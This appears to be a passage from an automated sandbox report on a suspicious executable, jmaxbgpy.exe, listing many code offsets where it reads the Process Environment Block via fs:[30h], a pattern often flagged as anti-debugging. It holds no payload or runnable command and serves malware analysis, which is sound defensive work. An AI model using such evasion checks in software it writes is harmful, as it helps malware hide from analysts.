          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]3_2_00AE002D
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]3_2_00ACB02A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]3_2_00ACB02A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]3_2_00ACB02A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]3_2_00ACB02A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h]3_2_00B37016
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h]3_2_00B37016
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h]3_2_00B37016
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B84015 mov eax, dword ptr fs:[00000030h]3_2_00B84015
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B84015 mov eax, dword ptr fs:[00000030h]3_2_00B84015
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B72073 mov eax, dword ptr fs:[00000030h]3_2_00B72073
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B81074 mov eax, dword ptr fs:[00000030h]3_2_00B81074
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AD0050 mov eax, dword ptr fs:[00000030h]3_2_00AD0050
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AD0050 mov eax, dword ptr fs:[00000030h]3_2_00AD0050
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]3_2_00B351BE
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]3_2_00B351BE
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]3_2_00B351BE
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]3_2_00B351BE
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE61A0 mov eax, dword ptr fs:[00000030h]3_2_00AE61A0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE61A0 mov eax, dword ptr fs:[00000030h]3_2_00AE61A0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]3_2_00B749A4
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]3_2_00B749A4
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]3_2_00B749A4
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]3_2_00B749A4
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B369A6 mov eax, dword ptr fs:[00000030h]3_2_00B369A6
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AEA185 mov eax, dword ptr fs:[00000030h]3_2_00AEA185
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ADC182 mov eax, dword ptr fs:[00000030h]3_2_00ADC182
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE2990 mov eax, dword ptr fs:[00000030h]3_2_00AE2990
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]3_2_00ABB1E1
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]3_2_00ABB1E1
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]3_2_00ABB1E1
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B441E8 mov eax, dword ptr fs:[00000030h]3_2_00B441E8
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]3_2_00AD4120
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]3_2_00AD4120
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]3_2_00AD4120
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]3_2_00AD4120
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AD4120 mov ecx, dword ptr fs:[00000030h]3_2_00AD4120
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE513A mov eax, dword ptr fs:[00000030h]3_2_00AE513A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE513A mov eax, dword ptr fs:[00000030h]3_2_00AE513A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h]3_2_00AB9100
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h]3_2_00AB9100
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h]3_2_00AB9100
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ABC962 mov eax, dword ptr fs:[00000030h]3_2_00ABC962
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ABB171 mov eax, dword ptr fs:[00000030h]3_2_00ABB171
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ABB171 mov eax, dword ptr fs:[00000030h]3_2_00ABB171
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ADB944 mov eax, dword ptr fs:[00000030h]3_2_00ADB944
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ADB944 mov eax, dword ptr fs:[00000030h]3_2_00ADB944
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]3_2_00AB52A5
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]3_2_00AB52A5
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]3_2_00AB52A5
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]3_2_00AB52A5
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]3_2_00AB52A5
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]3_2_00ACAAB0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]3_2_00ACAAB0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AEFAB0 mov eax, dword ptr fs:[00000030h]3_2_00AEFAB0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AED294 mov eax, dword ptr fs:[00000030h]3_2_00AED294
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AED294 mov eax, dword ptr fs:[00000030h]3_2_00AED294
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE2AE4 mov eax, dword ptr fs:[00000030h]3_2_00AE2AE4
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE2ACB mov eax, dword ptr fs:[00000030h]3_2_00AE2ACB
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF4A2C mov eax, dword ptr fs:[00000030h]3_2_00AF4A2C
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF4A2C mov eax, dword ptr fs:[00000030h]3_2_00AF4A2C
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B7AA16 mov eax, dword ptr fs:[00000030h]3_2_00B7AA16
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B7AA16 mov eax, dword ptr fs:[00000030h]3_2_00B7AA16
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC8A0A mov eax, dword ptr fs:[00000030h]3_2_00AC8A0A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AD3A1C mov eax, dword ptr fs:[00000030h]3_2_00AD3A1C
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h]3_2_00AB5210
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB5210 mov ecx, dword ptr fs:[00000030h]3_2_00AB5210
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h]3_2_00AB5210
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h]3_2_00AB5210
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h]3_2_00ABAA16
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h]3_2_00ABAA16
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF927A mov eax, dword ptr fs:[00000030h]3_2_00AF927A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B6B260 mov eax, dword ptr fs:[00000030h]3_2_00B6B260
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B6B260 mov eax, dword ptr fs:[00000030h]3_2_00B6B260
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B88A62 mov eax, dword ptr fs:[00000030h]3_2_00B88A62
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B7EA55 mov eax, dword ptr fs:[00000030h]3_2_00B7EA55
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B44257 mov eax, dword ptr fs:[00000030h]3_2_00B44257
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]3_2_00AB9240
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]3_2_00AB9240
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]3_2_00AB9240
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]3_2_00AB9240
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h]3_2_00AE4BAD
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h]3_2_00AE4BAD
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h]3_2_00AE4BAD
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B85BA5 mov eax, dword ptr fs:[00000030h]3_2_00B85BA5
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC1B8F mov eax, dword ptr fs:[00000030h]3_2_00AC1B8F
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC1B8F mov eax, dword ptr fs:[00000030h]3_2_00AC1B8F
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B6D380 mov ecx, dword ptr fs:[00000030h]3_2_00B6D380
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE2397 mov eax, dword ptr fs:[00000030h]3_2_00AE2397
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B7138A mov eax, dword ptr fs:[00000030h]3_2_00B7138A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AEB390 mov eax, dword ptr fs:[00000030h]3_2_00AEB390
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ADDBE9 mov eax, dword ptr fs:[00000030h]3_2_00ADDBE9
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]3_2_00AE03E2
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]3_2_00AE03E2
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]3_2_00AE03E2
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]3_2_00AE03E2
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]3_2_00AE03E2
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]3_2_00AE03E2
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B353CA mov eax, dword ptr fs:[00000030h]3_2_00B353CA
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B353CA mov eax, dword ptr fs:[00000030h]3_2_00B353CA
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B7131B mov eax, dword ptr fs:[00000030h]3_2_00B7131B
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ABDB60 mov ecx, dword ptr fs:[00000030h]3_2_00ABDB60
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE3B7A mov eax, dword ptr fs:[00000030h]3_2_00AE3B7A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE3B7A mov eax, dword ptr fs:[00000030h]3_2_00AE3B7A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B88B58 mov eax, dword ptr fs:[00000030h]3_2_00B88B58
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ABDB40 mov eax, dword ptr fs:[00000030h]3_2_00ABDB40
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ABF358 mov eax, dword ptr fs:[00000030h]3_2_00ABF358
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC849B mov eax, dword ptr fs:[00000030h]3_2_00AC849B
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]3_2_00B36CF0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]3_2_00B36CF0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]3_2_00B36CF0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B714FB mov eax, dword ptr fs:[00000030h]3_2_00B714FB
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B88CD6 mov eax, dword ptr fs:[00000030h]3_2_00B88CD6
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AEBC2C mov eax, dword ptr fs:[00000030h]3_2_00AEBC2C
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]3_2_00B8740D
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]3_2_00B8740D
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]3_2_00B8740D
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]3_2_00B36C0A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]3_2_00B36C0A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]3_2_00B36C0A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]3_2_00B36C0A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AD746D mov eax, dword ptr fs:[00000030h]3_2_00AD746D
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B4C450 mov eax, dword ptr fs:[00000030h]3_2_00B4C450
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B4C450 mov eax, dword ptr fs:[00000030h]3_2_00B4C450
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AEA44B mov eax, dword ptr fs:[00000030h]3_2_00AEA44B
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE35A1 mov eax, dword ptr fs:[00000030h]3_2_00AE35A1
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B805AC mov eax, dword ptr fs:[00000030h]3_2_00B805AC
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B805AC mov eax, dword ptr fs:[00000030h]3_2_00B805AC
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]3_2_00AE1DB5
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]3_2_00AE1DB5
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]3_2_00AE1DB5
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]3_2_00AB2D8A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]3_2_00AB2D8A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]3_2_00AB2D8A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]3_2_00AB2D8A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]3_2_00AB2D8A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]3_2_00AE2581
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]3_2_00AE2581
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]3_2_00AE2581
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]3_2_00AE2581
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AEFD9B mov eax, dword ptr fs:[00000030h]3_2_00AEFD9B
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AEFD9B mov eax, dword ptr fs:[00000030h]3_2_00AEFD9B
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B68DF1 mov eax, dword ptr fs:[00000030h]3_2_00B68DF1
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]3_2_00ACD5E0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]3_2_00ACD5E0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B7FDE2
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B7FDE2
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B7FDE2
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B7FDE2
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B36DC9 mov ecx, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B3A537 mov eax, dword ptr fs:[00000030h]3_2_00B3A537
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B88D34 mov eax, dword ptr fs:[00000030h]3_2_00B88D34
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B7E539 mov eax, dword ptr fs:[00000030h]3_2_00B7E539
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]3_2_00AE4D3B
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]3_2_00AE4D3B
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]3_2_00AE4D3B
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ABAD30 mov eax, dword ptr fs:[00000030h]3_2_00ABAD30
